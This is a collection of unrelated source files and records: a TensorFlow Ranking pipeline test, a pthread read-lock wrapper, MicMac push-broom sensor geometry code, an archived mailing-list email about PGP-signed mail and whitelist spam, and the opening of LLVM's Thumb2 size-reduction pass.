    dataset_hparams = pipeline.DatasetHparams(
        train_input_pattern=data_file,
        valid_input_pattern=data_file,
        train_batch_size=128,
        valid_batch_size=128,
        list_size=2,
        dataset_reader=tf.data.TFRecordDataset,
        convert_labels_to_binary=False)
    pipeline_hparams = pipeline.PipelineHparams(
        model_dir=model_dir,
        num_epochs=2,
        steps_per_epoch=5,
        validation_steps=2,
        learning_rate=0.01,
        loss="softmax_loss",
        export_best_model=True,
        automatic_reduce_lr=True,
        strategy=strategy)
    context_feature_spec = {
        "cf_1":
            tf.io.FixedLenFeature(
                shape=(1,), dtype=tf.float32, default_value=0.0),
    }
    # custom_features_1..3; defaults cover keys absent from an example.
    example_feature_spec = {
        "custom_features_{}".format(i + 1):
            tf.io.FixedLenFeature(shape=(1,), dtype=tf.float32, default_value=0.0)
        for i in range(3)
    }
    label_spec = (_LABEL_FEATURE,
                  tf.io.FixedLenFeature(
                      shape=(1,),
                      dtype=tf.float32,
                      default_value=_PADDING_LABEL))
    dnn_scorer = model_lib.DNNScorer(hidden_layer_dims=[16, 8], output_units=1)
    model_builder = model_lib.ModelBuilder(
        input_creator=model_lib.FeatureSpecInputCreator(context_feature_spec,
                                                        example_feature_spec),
        preprocessor=model_lib.PreprocessorWithSpec({}),
        scorer=dnn_scorer,
        mask_feature_name=_MASK,
        name="test_model",
    )
    ranking_pipeline = pipeline.SimplePipeline(
        model_builder,
        dataset_builder=pipeline.SimpleDatasetBuilder(
            context_feature_spec,
            example_feature_spec,
            _MASK,
            label_spec,
            dataset_hparams),
        hparams=pipeline_hparams)
    ranking_pipeline.train_and_validate(verbose=1)
    # The pipeline should leave a loadable SavedModel under export/latest_model.
    latest_model_path = os.path.join(model_dir, "export/latest_model")
    self.assertTrue(tf.saved_model.contains_saved_model(latest_model_path))
    latest_model = tf.saved_model.load(export_dir=latest_model_path)
    # Listwise "predict" signature: batch of 2 serialized ELWCs with 2
    # examples each -> logits of shape [2, 2].
    listwise_predictor = latest_model.signatures[
        tf.saved_model.PREDICT_METHOD_NAME]
    listwise_logits = listwise_predictor(
        tf.convert_to_tensor([ELWC.SerializeToString()] *
                             2))[tf.saved_model.PREDICT_OUTPUTS]
    self.assertAllEqual([2, 2], listwise_logits.get_shape().as_list())
    # Pointwise "regress" signature: 2 flat Examples -> logits of shape [2].
    pointwise_predictor = latest_model.signatures[
        tf.saved_model.REGRESS_METHOD_NAME]
    pointwise_logits = pointwise_predictor(
        tf.convert_to_tensor([
            EXAMPLE_PROTO_1.SerializeToString(),
            EXAMPLE_PROTO_2.SerializeToString()
        ]))[tf.saved_model.REGRESS_OUTPUTS]
    self.assertAllEqual([2], pointwise_logits.get_shape().as_list())
    # Pointwise scores must agree with the listwise scores of the same
    # examples (the protos encode the same features).
    self.assertAllClose(pointwise_logits, listwise_logits[0])

  def test_pipeline_with_multi_task(self):
    """Trains a MultiTaskPipeline with two losses and checks both signatures."""
    data_dir = self.create_tempdir()
    data_file = os.path.join(data_dir, "elwc.tfrecord")
    if tf.io.gfile.exists(data_file):
      tf.io.gfile.remove(data_file)
    with tf.io.TFRecordWriter(data_file) as writer:
      for _ in range(256):
        writer.write(ELWC.SerializeToString())
    model_dir = os.path.join(data_dir, "model")
    dataset_hparams = pipeline.DatasetHparams(
        train_input_pattern=data_file,
        valid_input_pattern=data_file,
        train_batch_size=128,
        valid_batch_size=128,
        list_size=2,
        dataset_reader=tf.data.TFRecordDataset,
        convert_labels_to_binary=False)
    # Per-task losses and weights keyed by the scorer's output names.
    pipeline_hparams = pipeline.PipelineHparams(
        model_dir=model_dir,
        num_epochs=2,
        steps_per_epoch=5,
        validation_steps=2,
        learning_rate=0.01,
        loss={
            "task1": "softmax_loss",
            "task2": "pairwise_logistic_loss"
        },
        loss_weights={
            "task1": 1.0,
            "task2": 2.0
        },
        export_best_model=True,
        strategy="MirroredStrategy")
    context_feature_spec = {
        "cf_1":
            tf.io.FixedLenFeature(
                shape=(1,), dtype=tf.float32, default_value=0.0),
    }
    example_feature_spec = {
        "custom_features_{}".format(i + 1):
            tf.io.FixedLenFeature(shape=(1,), dtype=tf.float32, default_value=0.0)
        for i in range(3)
    }
    label_spec = (_LABEL_FEATURE,
                  tf.io.FixedLenFeature(
                      shape=(1,),
                      dtype=tf.float32,
                      default_value=_PADDING_LABEL))
    # Both tasks read the same label feature in this test.
    label_spec = {"task1": label_spec, "task2": label_spec}
    # Optional per-example sample weight; defaults to 1.0 when absent.
    weight_spec = ("weight",
                   tf.io.FixedLenFeature(
                       shape=(1,), dtype=tf.float32, default_value=1.))
    model_builder = model_lib.ModelBuilder(
        input_creator=model_lib.FeatureSpecInputCreator(context_feature_spec,
                                                        example_feature_spec),
        preprocessor=model_lib.PreprocessorWithSpec({}),
        scorer=DummyMultiTaskScorer(),
        mask_feature_name=_MASK,
        name="multi_task_model",
    )
    ranking_pipeline = pipeline.MultiTaskPipeline(
        model_builder,
        dataset_builder=pipeline.MultiLabelDatasetBuilder(
            context_feature_spec,
            example_feature_spec,
            _MASK,
            label_spec,
            dataset_hparams,
            sample_weight_spec=weight_spec),
        hparams=pipeline_hparams)
    ranking_pipeline.train_and_validate(verbose=1)
    latest_model_path = os.path.join(model_dir, "export/latest_model")
    self.assertTrue(tf.saved_model.contains_saved_model(latest_model_path))
    latest_model = tf.saved_model.load(export_dir=latest_model_path)
    # Signatures are keyed per task; probe "task1" outputs for both the
    # listwise and pointwise paths.
    listwise_predictor = latest_model.signatures[
        tf.saved_model.PREDICT_METHOD_NAME]
    listwise_logits = listwise_predictor(
        tf.convert_to_tensor([ELWC.SerializeToString()] * 2))["task1"]
    self.assertAllEqual([2, 2], listwise_logits.get_shape().as_list())
    pointwise_predictor = latest_model.signatures[
        tf.saved_model.REGRESS_METHOD_NAME]
    pointwise_logits = pointwise_predictor(
        tf.convert_to_tensor([
            EXAMPLE_PROTO_1.SerializeToString(),
            EXAMPLE_PROTO_2.SerializeToString()
        ]))["task1"]
    self.assertAllEqual([2], pointwise_logits.get_shape().as_list())
    self.assertAllClose(pointwise_logits, listwise_logits[0])
if __name__ == "__main__":
  # Run all test cases via the TensorFlow test runner.
  tf.test.main()
| 4,973 |
12,718 | <gh_stars>1000+
#include "pthread_impl.h"
/* Acquire a read lock, blocking until it becomes available.
 *
 * Implemented by delegating to the timed variant with a null timeout
 * pointer, which __pthread_rwlock_timedrdlock treats as "wait forever". */
int __pthread_rwlock_rdlock(pthread_rwlock_t *rw)
{
	return __pthread_rwlock_timedrdlock(rw, 0);
}

/* Expose the public POSIX name as a weak alias of the internal symbol so
 * libc internals can call it without user-symbol interposition. */
weak_alias(__pthread_rwlock_rdlock, pthread_rwlock_rdlock);
| 90 |
451 | <gh_stars>100-1000
/*Header-MicMac-eLiSe-25/06/2007
MicMac : Multi Image Correspondances par Methodes Automatiques de Correlation
eLiSe : ELements of an Image Software Environnement
www.micmac.ign.fr
Copyright : Institut Geographique National
Author : <NAME>
Contributors : <NAME>, <NAME>.
[1] <NAME>, <NAME>.
"A multiresolution and optimization-based image matching approach:
An application to surface reconstruction from SPOT5-HRS stereo imagery."
In IAPRS vol XXXVI-1/W41 in ISPRS Workshop On Topographic Mapping From Space
(With Special Emphasis on Small Satellites), Ankara, Turquie, 02-2006.
[2] <NAME>, "MicMac, un lociel de mise en correspondance
d'images, adapte au contexte geograhique" to appears in
Bulletin d'information de l'Institut Geographique National, 2007.
Francais :
MicMac est un logiciel de mise en correspondance d'image adapte
au contexte de recherche en information geographique. Il s'appuie sur
la bibliotheque de manipulation d'image eLiSe. Il est distibue sous la
licences Cecill-B. Voir en bas de fichier et http://www.cecill.info.
English :
MicMac is an open source software specialized in image matching
for research in geographic information. MicMac is built on the
eLiSe image library. MicMac is governed by the "Cecill-B licence".
See below and http://www.cecill.info.
Header-MicMac-eLiSe-25/06/2007*/
#include "SatPhysMod.h"
/**********************************************************************/
/* */
/* cPushB_GeomLine */
/* */
/**********************************************************************/
// Build the per-line geometric model of a push-broom sensor for image row anY:
// sample aNbSampleX+1 viewing rays across the row, estimate their common
// (pseudo) optical center, fit the plane containing the ray directions, and
// derive an orthonormal frame (mAxeX, mAxeY, mAxeZ) plus per-sample
// calibration angles.
cPushB_GeomLine::cPushB_GeomLine(const cPushB_PhysMod * aPBPM,int aNbSampleX,double anY) :
    mPBPM      (aPBPM),
    mNbX       (aNbSampleX),
    mY         (anY),
    mPlanRay   (Pt3dr(0,0,0),Pt3dr(1,0,0),Pt3dr(0,1,0))
{
    // Computation of segments and centers
    std::vector<ElSeg3D> aVSeg;
    bool Ok;
    for (int aKS=0 ; aKS<=aNbSampleX ; aKS++)
    {
        // One ground-viewing segment per image sample of this row.
        aVSeg.push_back(mPBPM->Im2GeoC(PIm(aKS)));
    }
    // Pseudo optical center = least-squares intersection of all rays.
    mCenter = InterSeg(aVSeg,Ok);
    mCUnRot = mCenter;
    double aSomD=0;
    mMaxResInt = 0;
    Pt3dr aSpeed = vunit(aPBPM->Rough_GroundSpeed(anY));
    // Computation of directions
    std::vector<Pt3dr> aVDirOrient;
    {
        std::vector<Pt3dr> aVDirCalcPlan;
        for (int aKS=0 ; aKS<int(aVSeg.size()) ; aKS++)
        {
            // Distance of each ray to the estimated center = intersection residual.
            double aDist = aVSeg[aKS].DistDoite(mCenter);
            aSomD += aDist;
            ElSetMax(mMaxResInt,aDist);
            Pt3dr aDir = vunit(aVSeg[aKS].Mil()-mCenter);
            aVDirOrient.push_back(aDir);
            // we want to enforce the fact that the plane contains (0,0,0) so we add P and -P
            // to this observation
            aVDirCalcPlan.push_back(aDir);
            aVDirCalcPlan.push_back(-aDir);
        }
        // Best-fit plane through the ray directions (and the origin).
        mPlanRay = cElPlan3D(aVDirCalcPlan,0);
    }
    mResInt = aSomD / aVSeg.size();
    // R=CoordPlan2Euclid() affine rotation such that, if P is in plane coordinates
    // R(P) is in global coordinates;
    // NOTE(review): aRe2p is computed but not used below (see the commented-out
    // aX0 line); kept as-is to preserve behavior.
    ElRotation3D aRe2p = mPlanRay.CoordPlan2Euclid().inv();
    // Y axis = plane normal, oriented along the rough ground-speed direction.
    mAxeY = mPlanRay.Norm();
    if (scal(aSpeed,mAxeY) < 0)
       mAxeY = -mAxeY;
    // Pt3dr aX0 = vunit(mPlanRay.Proj(aRe2p.ImAff(aVDirPlan[aVSeg.size()/2])));
    // Z axis initialized from the central sample's direction.
    int aK0 = (int)(aVSeg.size() / 2);
    mAxeZ = DirOnPlan(aVDirOrient[aK0]);
    mAxeX = vunit(mAxeY ^mAxeZ);
    mMoyDistPlan = 0.0;
    mMaxDistPlan = 0.0;
    double aTetaMoy = 0.0;
    for (int aKS=0 ; aKS<int(aVSeg.size()) ; aKS++)
    {
        Pt3dr aD = aVDirOrient[aKS];
        // Distance of the direction to the plane = |component along the normal|.
        double aDPlan = ElAbs(scal(mAxeY,aD));
        mMoyDistPlan += aDPlan;
        ElSetMax(mMaxDistPlan,aDPlan);
        Pt3dr aProjDir = DirOnPlan(aD);
        // Clamp dot products to [-1,1] before atan2 to guard against rounding.
        double aScalZ = ElMax(-1.0,ElMin(1.0,scal(mAxeZ,aProjDir)));
        double aScalX = ElMax(-1.0,ElMin(1.0,scal(mAxeX,aProjDir)));
        double aTeta = atan2(aScalX,aScalZ);
        aTetaMoy += aTeta;
    }
    // Re-center the Z axis on the mean angular direction of all samples.
    aTetaMoy /= aVSeg.size();
    mAxeZ = DirOnPlan(mAxeZ*cos(aTetaMoy) + mAxeX * sin(aTetaMoy));
    mAxeX = vunit(mAxeY ^mAxeZ);
    mMoyDistPlan /= aVSeg.size();
    for (int aKS=0 ; aKS<int(aVSeg.size()) ; aKS++)
    {
        // Calibration: tangent of each sample's angle in the (X,Z) frame.
        Pt3dr aD = DirOnPlan(aVDirOrient[aKS]);
        double aZ = scal(mAxeZ,aD);
        double aX = scal(mAxeX,aD);
        mCalib.push_back(aX/aZ);
    }
}
// Project aP onto the ray plane, then normalize the projection to unit length.
Pt3dr cPushB_GeomLine::DirOnPlan(const Pt3dr & aP) const
{
    const Pt3dr aProj = mPlanRay.Proj(aP);
    return vunit(aProj);
}
// Rotation matrix whose columns are the line's camera axes (camera -> world).
ElMatrix<double> cPushB_GeomLine::MatC2M() const
{
    ElMatrix<double> aCam2World = MatFromCol(mAxeX,mAxeY,mAxeZ);
    return aCam2World;
}
// Relative rotation taking coordinates of this line's camera frame into
// aCam2's camera frame: (C2 -> world)^T composed with (C1 -> world).
ElMatrix<double> cPushB_GeomLine::MatC1ToC2(cPushB_GeomLine & aCam2) const
{
    ElMatrix<double> aWorld2C2 = aCam2.MatC2M().transpose();
    return aWorld2C2 * MatC2M();
}
// Image abscissa of sample aKx: spreads mNbX+1 samples evenly across the
// image width (or height when X/Y are swapped), at cell centers.
double cPushB_GeomLine::XIm(int aKx) const
{
    const double aWidth = mPBPM->SwapXY() ? mPBPM->Sz().y : mPBPM->Sz().x;
    return aWidth * (aKx+0.5) / (mNbX+1);
}
// Full image point of sample aKx on this line, honoring the model's
// convention of swapped X/Y axes when SwapXY() is set.
Pt2dr cPushB_GeomLine::PIm(int aKx) const
{
    if (mPBPM->SwapXY())
        return Pt2dr(mY,XIm(aKx));
    return Pt2dr(XIm(aKx),mY);
}
// Estimated (pseudo) optical center of the line.
const Pt3dr & cPushB_GeomLine::Center() const {return mCenter;}
// Mean distance of the rays to the estimated center (intersection residual).
const double & cPushB_GeomLine::MoyResiduCenter() const {return mResInt;}
// Worst-case distance of a ray to the estimated center.
const double & cPushB_GeomLine::MaxResiduCenter() const {return mMaxResInt;}
// Mean distance of the ray directions to the fitted ray plane.
const double & cPushB_GeomLine::MoyDistPlan() const {return mMoyDistPlan;}
// Maximum distance of a ray direction to the fitted ray plane.
const double & cPushB_GeomLine::MaxDistPlan() const {return mMaxDistPlan;}
// "Un-rotated" center, initialized to Center(); mutable via the non-const overload.
const Pt3dr & cPushB_GeomLine::CUnRot() const {return mCUnRot;}
Pt3dr & cPushB_GeomLine::CUnRot() {return mCUnRot;}
// Per-sample calibration ratios (x/z in the line's own frame).
// NOTE(review): returns by value; the leading const has no effect here and a
// const reference would avoid the copy — signature fixed by the header.
const std::vector<double> cPushB_GeomLine::Calib() const {return mCalib;}
/*Footer-MicMac-eLiSe-25/06/2007
Ce logiciel est un programme informatique servant à la mise en
correspondances d'images pour la reconstruction du relief.
Ce logiciel est régi par la licence CeCILL-B soumise au droit français et
respectant les principes de diffusion des logiciels libres. Vous pouvez
utiliser, modifier et/ou redistribuer ce programme sous les conditions
de la licence CeCILL-B telle que diffusée par le CEA, le CNRS et l'INRIA
sur le site "http://www.cecill.info".
En contrepartie de l'accessibilité au code source et des droits de copie,
de modification et de redistribution accordés par cette licence, il n'est
offert aux utilisateurs qu'une garantie limitée. Pour les mêmes raisons,
seule une responsabilité restreinte pèse sur l'auteur du programme, le
titulaire des droits patrimoniaux et les concédants successifs.
A cet égard l'attention de l'utilisateur est attirée sur les risques
associés au chargement, à l'utilisation, à la modification et/ou au
développement et à la reproduction du logiciel par l'utilisateur étant
donné sa spécificité de logiciel libre, qui peut le rendre complexe à
manipuler et qui le réserve donc à des développeurs et des professionnels
avertis possédant des connaissances informatiques approfondies. Les
utilisateurs sont donc invités à charger et tester l'adéquation du
logiciel à leurs besoins dans des conditions permettant d'assurer la
sécurité de leurs systèmes et ou de leurs données et, plus généralement,
à l'utiliser et l'exploiter dans les mêmes conditions de sécurité.
Le fait que vous puissiez accéder à cet en-tête signifie que vous avez
pris connaissance de la licence CeCILL-B, et que vous en avez accepté les
termes.
Footer-MicMac-eLiSe-25/06/2007*/
| 3,329 |
3,428 | {"id":"01014","group":"easy-ham-2","checksum":{"type":"MD5","value":"d86f7cf4bda937a58e7af5aef3f71649"},"text":"From <EMAIL> Mon Aug 12 11:11:29 2002\nReturn-Path: <<EMAIL>>\nDelivered-To: yyyy<EMAIL>.netnoteinc.com\nReceived: from localhost (localhost [127.0.0.1])\n\tby phobos.labs.netnoteinc.com (Postfix) with ESMTP id 2AF374417C\n\tfor <jm@localhost>; Mon, 12 Aug 2002 05:57:18 -0400 (EDT)\nReceived: from phobos [127.0.0.1]\n\tby localhost with IMAP (fetchmail-5.9.0)\n\tfor jm@localhost (single-drop); Mon, 12 Aug 2002 10:57:18 +0100 (IST)\nReceived: from xent.com ([64.161.22.236]) by dogma.slashnull.org\n (8.11.6/8.11.6) with ESMTP id g7BMpob17088 for <<EMAIL>>;\n Sun, 11 Aug 2002 23:51:51 +0100\nReceived: from lair.xent.com (localhost [127.0.0.1]) by xent.com (Postfix)\n with ESMTP id 560D5294190; Sun, 11 Aug 2002 15:50:07 -0700 (PDT)\nDelivered-To: <EMAIL>\nReceived: from tux.w3.org (tux.w3.org [18.29.0.27]) by xent.com (Postfix)\n with ESMTP id 23EDB294142 for <<EMAIL>>; Sun, 11 Aug 2002 15:49:49\n -0700 (PDT)\nReceived: from w3.org (IDENT:[email protected] [18.29.0.27]) by tux.w3.org\n (8.9.3/8.9.3) with ESMTP id SAA15363; Sun, 11 Aug 2002 18:50:50 -0400\nMessage-Id: <<EMAIL>>\nFrom: <NAME> <<EMAIL>>\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1a) Gecko/20020610\nX-Accept-Language: en-us, en\nMIME-Version: 1.0\nTo: <NAME> <<EMAIL>>\nCc: fork <<EMAIL>>\nSubject: Re: Forged whitelist spam\nReferences: <Pine.LNX.4.33.0208111330190.398<EMAIL>>\n <005301c24179$ac92b820$640a000a@golden>\nX-Enigmail-Version: 0.63.3.0\nX-Enigmail-Supports: pgp-inline, pgp-mime\nContent-Type: text/plain; charset=us-ascii; format=flowed\nContent-Transfer-Encoding: 7bit\nSender: fork-<EMAIL>\nErrors-To: fork-admin<EMAIL>.com\nX-Beenthere: <EMAIL>assassin.taint.org\nX-Mailman-Version: 2.0.11\nPrecedence: bulk\nList-Help: <mailto:<EMAIL>?subject=help>\nList-Post: <mailto:<EMAIL>>\nList-Subscribe: <http://xent.com/mailman/listinfo/fork>, 
<mailto:<EMAIL>?subject=subscribe>\nList-Id: Friends of <NAME> <fork.xent.com>\nList-Unsubscribe: <http://xent.com/mailman/listinfo/fork>,\n <mailto:<EMAIL>?subject=unsubscribe>\nList-Archive: <http://xent.com/pipermail/fork/>\nDate: Sun, 11 Aug 2002 23:15:58 +0000\n\n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n\n<NAME> wrote:\n> <NAME> writes:\n> \n>>On Sun, 11 Aug 2002, <NAME> wrote:\n>>\n>>>If you crypto-sign your outgoing mail, you don't have to set your\n>>>mailwall whitelist to accept unsigned mail spoofed as being from you.\n\nYup, I've been meaning to cobble together procmail + script for this, as \na few Google searches didn't turn up anything. Did anyone here get there \nfirst?\n\n(I guess I want a config file of mailboxes who normally sign their mail, \nand procmail that runs gpg and adds headers...)\n\n>>Users don't like entering passphrases when sending email. USB fobs, smart \n>>cards or other removable hardware are not yet widespread.\n> \n> Bad assumption.\n> \n> A reasonable UI would have me enter my passphrase *at most* each \n> time I launch my mail program -- never more than once per day,\n> sometimes once per week. \n\nFWIW, the 'Enigmail' add-on for Mozilla's mail client has it happily \ntalking to GPG (and I believe PGP). You can choose how long it remembers \nyour passphrase for, default is 15 mins.\n\nsee http://enigmail.mozdev.org/\n\nThis feature was enough to get my off my Pine habit, since (to answer \nthe original question) the combination of SpamAssassin and shared \nwhitelists means that forged 'From:' headers are pretty much the only \nspam I see in my inbox now.\n\nDan\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niD8DBQE9VvAyPhXvL3Mij+QRAkDdAJ4m/LO7Y0aki66H5AIwbmsX8Q/PegCfSQgI\nZW2XmlcnQtrzALPimthvlr8=\n=wdf/\n-----END PGP SIGNATURE-----\n\nhttp://xent.com/mailman/listinfo/fork\n\n\n"} | 1,594 |
2,338 | //===-- Thumb2SizeReduction.cpp - Thumb2 code size reduction pass -*- C++ -*-=//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
#include "ARM.h"
#include "ARMBaseInstrInfo.h"
#include "ARMSubtarget.h"
#include "MCTargetDesc/ARMBaseInfo.h"
#include "Thumb2InstrInfo.h"
#include "llvm/ADT/DenseMap.h"
#include "llvm/ADT/PostOrderIterator.h"
#include "llvm/ADT/STLExtras.h"
#include "llvm/ADT/SmallSet.h"
#include "llvm/ADT/SmallVector.h"
#include "llvm/ADT/Statistic.h"
#include "llvm/ADT/StringRef.h"
#include "llvm/CodeGen/MachineBasicBlock.h"
#include "llvm/CodeGen/MachineFunction.h"
#include "llvm/CodeGen/MachineFunctionPass.h"
#include "llvm/CodeGen/MachineInstr.h"
#include "llvm/CodeGen/MachineInstrBuilder.h"
#include "llvm/CodeGen/MachineOperand.h"
#include "llvm/CodeGen/TargetInstrInfo.h"
#include "llvm/IR/DebugLoc.h"
#include "llvm/IR/Function.h"
#include "llvm/MC/MCInstrDesc.h"
#include "llvm/MC/MCRegisterInfo.h"
#include "llvm/Support/CommandLine.h"
#include "llvm/Support/Compiler.h"
#include "llvm/Support/Debug.h"
#include "llvm/Support/ErrorHandling.h"
#include "llvm/Support/raw_ostream.h"
#include <algorithm>
#include <cassert>
#include <cstdint>
#include <functional>
#include <iterator>
#include <utility>
using namespace llvm;
#define DEBUG_TYPE "thumb2-reduce-size"
#define THUMB2_SIZE_REDUCE_NAME "Thumb2 instruction size reduce pass"
STATISTIC(NumNarrows, "Number of 32-bit instrs reduced to 16-bit ones");
STATISTIC(Num2Addrs, "Number of 32-bit instrs reduced to 2addr 16-bit ones");
STATISTIC(NumLdSts, "Number of 32-bit load / store reduced to 16-bit ones");
static cl::opt<int> ReduceLimit("t2-reduce-limit",
cl::init(-1), cl::Hidden);
static cl::opt<int> ReduceLimit2Addr("t2-reduce-limit2",
cl::init(-1), cl::Hidden);
static cl::opt<int> ReduceLimitLdSt("t2-reduce-limit3",
cl::init(-1), cl::Hidden);
namespace {
  /// ReduceTable - A static table with information on mapping from wide
  /// opcodes to narrow. One row describes how a single 32-bit Thumb2 opcode
  /// may be rewritten as a 16-bit Thumb1 instruction.
  struct ReduceEntry {
    uint16_t WideOpc;      // Wide opcode (the 32-bit Thumb2 instruction)
    uint16_t NarrowOpc1;   // Narrow opcode to transform to (0 = none)
    uint16_t NarrowOpc2;   // Narrow opcode when it's two-address (0 = none)
    uint8_t  Imm1Limit;    // Limit of immediate field (bits)
    uint8_t  Imm2Limit;    // Limit of immediate field when it's two-address
    unsigned LowRegs1 : 1; // Only possible if low-registers are used
    unsigned LowRegs2 : 1; // Only possible if low-registers are used (2addr)
    unsigned PredCC1  : 2; // 0 - If predicated, cc is on and vice versa.
                           // 1 - No cc field.
                           // 2 - Always set CPSR.
    unsigned PredCC2  : 2; // Same encoding as PredCC1, for the 2addr form.
    unsigned PartFlag : 1; // 16-bit instruction does partial flag update
    unsigned Special  : 1; // Needs to be dealt with specially
    unsigned AvoidMovs: 1; // Avoid movs with shifter operand (for Swift)
  };
  // Mapping of every reducible wide opcode to its 16-bit candidates. A 0 in
  // the Narrow1/Narrow2 column means that form has no 16-bit equivalent.
  static const ReduceEntry ReduceTable[] = {
  // Wide, Narrow1, Narrow2, imm1,imm2, lo1, lo2, P/C,PF,S,AM
  { ARM::t2ADCrr, 0, ARM::tADC, 0, 0, 0, 1, 0,0, 0,0,0 },
  { ARM::t2ADDri, ARM::tADDi3, ARM::tADDi8, 3, 8, 1, 1, 0,0, 0,1,0 },
  { ARM::t2ADDrr, ARM::tADDrr, ARM::tADDhirr, 0, 0, 1, 0, 0,1, 0,0,0 },
  { ARM::t2ADDSri,ARM::tADDi3, ARM::tADDi8, 3, 8, 1, 1, 2,2, 0,1,0 },
  { ARM::t2ADDSrr,ARM::tADDrr, 0, 0, 0, 1, 0, 2,0, 0,1,0 },
  { ARM::t2ANDrr, 0, ARM::tAND, 0, 0, 0, 1, 0,0, 1,0,0 },
  { ARM::t2ASRri, ARM::tASRri, 0, 5, 0, 1, 0, 0,0, 1,0,1 },
  { ARM::t2ASRrr, 0, ARM::tASRrr, 0, 0, 0, 1, 0,0, 1,0,1 },
  { ARM::t2BICrr, 0, ARM::tBIC, 0, 0, 0, 1, 0,0, 1,0,0 },
  //FIXME: Disable CMN, as CCodes are backwards from compare expectations
  //{ ARM::t2CMNrr, ARM::tCMN, 0, 0, 0, 1, 0, 2,0, 0,0,0 },
  { ARM::t2CMNzrr, ARM::tCMNz, 0, 0, 0, 1, 0, 2,0, 0,0,0 },
  { ARM::t2CMPri, ARM::tCMPi8, 0, 8, 0, 1, 0, 2,0, 0,0,0 },
  { ARM::t2CMPrr, ARM::tCMPhir, 0, 0, 0, 0, 0, 2,0, 0,1,0 },
  { ARM::t2EORrr, 0, ARM::tEOR, 0, 0, 0, 1, 0,0, 1,0,0 },
  // FIXME: adr.n immediate offset must be multiple of 4.
  //{ ARM::t2LEApcrelJT,ARM::tLEApcrelJT, 0, 0, 0, 1, 0, 1,0, 0,0,0 },
  { ARM::t2LSLri, ARM::tLSLri, 0, 5, 0, 1, 0, 0,0, 1,0,1 },
  { ARM::t2LSLrr, 0, ARM::tLSLrr, 0, 0, 0, 1, 0,0, 1,0,1 },
  { ARM::t2LSRri, ARM::tLSRri, 0, 5, 0, 1, 0, 0,0, 1,0,1 },
  { ARM::t2LSRrr, 0, ARM::tLSRrr, 0, 0, 0, 1, 0,0, 1,0,1 },
  { ARM::t2MOVi, ARM::tMOVi8, 0, 8, 0, 1, 0, 0,0, 1,0,0 },
  { ARM::t2MOVi16,ARM::tMOVi8, 0, 8, 0, 1, 0, 0,0, 1,1,0 },
  // FIXME: Do we need the 16-bit 'S' variant?
  { ARM::t2MOVr,ARM::tMOVr, 0, 0, 0, 0, 0, 1,0, 0,0,0 },
  { ARM::t2MUL, 0, ARM::tMUL, 0, 0, 0, 1, 0,0, 1,0,0 },
  { ARM::t2MVNr, ARM::tMVN, 0, 0, 0, 1, 0, 0,0, 0,0,0 },
  { ARM::t2ORRrr, 0, ARM::tORR, 0, 0, 0, 1, 0,0, 1,0,0 },
  { ARM::t2REV, ARM::tREV, 0, 0, 0, 1, 0, 1,0, 0,0,0 },
  { ARM::t2REV16, ARM::tREV16, 0, 0, 0, 1, 0, 1,0, 0,0,0 },
  { ARM::t2REVSH, ARM::tREVSH, 0, 0, 0, 1, 0, 1,0, 0,0,0 },
  { ARM::t2RORrr, 0, ARM::tROR, 0, 0, 0, 1, 0,0, 1,0,0 },
  { ARM::t2RSBri, ARM::tRSB, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
  { ARM::t2RSBSri,ARM::tRSB, 0, 0, 0, 1, 0, 2,0, 0,1,0 },
  { ARM::t2SBCrr, 0, ARM::tSBC, 0, 0, 0, 1, 0,0, 0,0,0 },
  { ARM::t2SUBri, ARM::tSUBi3, ARM::tSUBi8, 3, 8, 1, 1, 0,0, 0,0,0 },
  { ARM::t2SUBrr, ARM::tSUBrr, 0, 0, 0, 1, 0, 0,0, 0,0,0 },
  { ARM::t2SUBSri,ARM::tSUBi3, ARM::tSUBi8, 3, 8, 1, 1, 2,2, 0,0,0 },
  { ARM::t2SUBSrr,ARM::tSUBrr, 0, 0, 0, 1, 0, 2,0, 0,0,0 },
  { ARM::t2SXTB, ARM::tSXTB, 0, 0, 0, 1, 0, 1,0, 0,1,0 },
  { ARM::t2SXTH, ARM::tSXTH, 0, 0, 0, 1, 0, 1,0, 0,1,0 },
  { ARM::t2TEQrr, ARM::tEOR, 0, 0, 0, 1, 0, 2,0, 0,1,0 },
  { ARM::t2TSTrr, ARM::tTST, 0, 0, 0, 1, 0, 2,0, 0,0,0 },
  { ARM::t2UXTB, ARM::tUXTB, 0, 0, 0, 1, 0, 1,0, 0,1,0 },
  { ARM::t2UXTH, ARM::tUXTH, 0, 0, 0, 1, 0, 1,0, 0,1,0 },
  // FIXME: Clean this up after splitting each Thumb load / store opcode
  // into multiple ones.
  { ARM::t2LDRi12,ARM::tLDRi, ARM::tLDRspi, 5, 8, 1, 0, 0,0, 0,1,0 },
  { ARM::t2LDRs, ARM::tLDRr, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
  { ARM::t2LDRBi12,ARM::tLDRBi, 0, 5, 0, 1, 0, 0,0, 0,1,0 },
  { ARM::t2LDRBs, ARM::tLDRBr, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
  { ARM::t2LDRHi12,ARM::tLDRHi, 0, 5, 0, 1, 0, 0,0, 0,1,0 },
  { ARM::t2LDRHs, ARM::tLDRHr, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
  { ARM::t2LDRSBs,ARM::tLDRSB, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
  { ARM::t2LDRSHs,ARM::tLDRSH, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
  { ARM::t2LDR_POST,ARM::tLDMIA_UPD,0, 0, 0, 1, 0, 0,0, 0,1,0 },
  { ARM::t2STRi12,ARM::tSTRi, ARM::tSTRspi, 5, 8, 1, 0, 0,0, 0,1,0 },
  { ARM::t2STRs, ARM::tSTRr, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
  { ARM::t2STRBi12,ARM::tSTRBi, 0, 5, 0, 1, 0, 0,0, 0,1,0 },
  { ARM::t2STRBs, ARM::tSTRBr, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
  { ARM::t2STRHi12,ARM::tSTRHi, 0, 5, 0, 1, 0, 0,0, 0,1,0 },
